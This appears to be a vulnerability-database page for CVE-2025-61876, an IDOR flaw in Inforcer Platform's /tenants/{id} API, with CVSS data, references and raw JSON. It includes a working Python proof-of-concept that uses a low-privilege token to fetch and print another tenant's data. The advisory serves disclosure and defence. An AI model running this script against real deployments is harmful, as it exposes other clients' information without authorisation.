Security Vulnerability Report
CVE-2025-61876 CVSS 5.0 MEDIUM

CVE-2025-61876

Published: 2025-10-29 19:15:38
Last Modified: 2026-04-15 00:35:42

Description

Insecure Direct Object Reference (IDOR) in /tenants/{id} API endpoint in Inforcer Platform version 2.0.153 allows an authenticated user with low privileges to enumerate and access tenant information belonging to other clients via modification of the tenant ID in the request URL.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Inforcer Platform 2.0.153

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-61876 IDOR PoC for Inforcer Platform
# Target: /tenants/{id} API endpoint


def test_idor(target_url, valid_tenant_id, target_tenant_id, auth_token):
    """
    Test for IDOR vulnerability in Inforcer Platform

    Args:
        target_url: Base URL of the target
        valid_tenant_id: A valid tenant ID you have access to
        target_tenant_id: A tenant ID you want to access (victim)
        auth_token: Authentication token for the low-privilege user
    """
    headers = {
        'Authorization': f'Bearer {auth_token}',
        'Content-Type': 'application/json'
    }

    # Legitimate request with own tenant ID
    legitimate_url = f"{target_url}/tenants/{valid_tenant_id}"
    resp1 = requests.get(legitimate_url, headers=headers)
    print(f"[*] Legitimate request to /tenants/{valid_tenant_id}: {resp1.status_code}")

    # Malicious request - accessing different tenant's data
    malicious_url = f"{target_url}/tenants/{target_tenant_id}"
    resp2 = requests.get(malicious_url, headers=headers)
    print(f"[*] Malicious request to /tenants/{target_tenant_id}: {resp2.status_code}")

    if resp2.status_code == 200 and resp2.text != resp1.text:
        print("[!] IDOR VULNERABILITY CONFIRMED!")
        print(f"[!] Retrieved data from tenant {target_tenant_id}")
        print(resp2.text)
        return True
    return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-61876_poc.py <url> <valid_id> <target_id> <token>")
        sys.exit(1)
    target = sys.argv[1]
    valid_id = sys.argv[2]
    target_id = sys.argv[3]
    token = sys.argv[4]
    test_idor(target, valid_id, target_id, token)

References

https://silvatech.uk/cve-2025-61876-inforcer-platform/
https://www.inforcer.com/platform

Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61876",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T19:15:38.330",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Insecure Direct Object Reference (IDOR) in /tenants/{id} API endpoint in Inforcer Platform version 2.0.153 allows an authenticated user with low privileges to enumerate and access tenant information belonging to other clients via modification of the tenant ID in the request URL."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "baseScore": 5.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://silvatech.uk/cve-2025-61876-inforcer-platform/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.inforcer.com/platform",
        "source": "[email protected]"
      },
      {
        "url": "https://silvatech.uk/cve-2025-61876-inforcer-platform/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}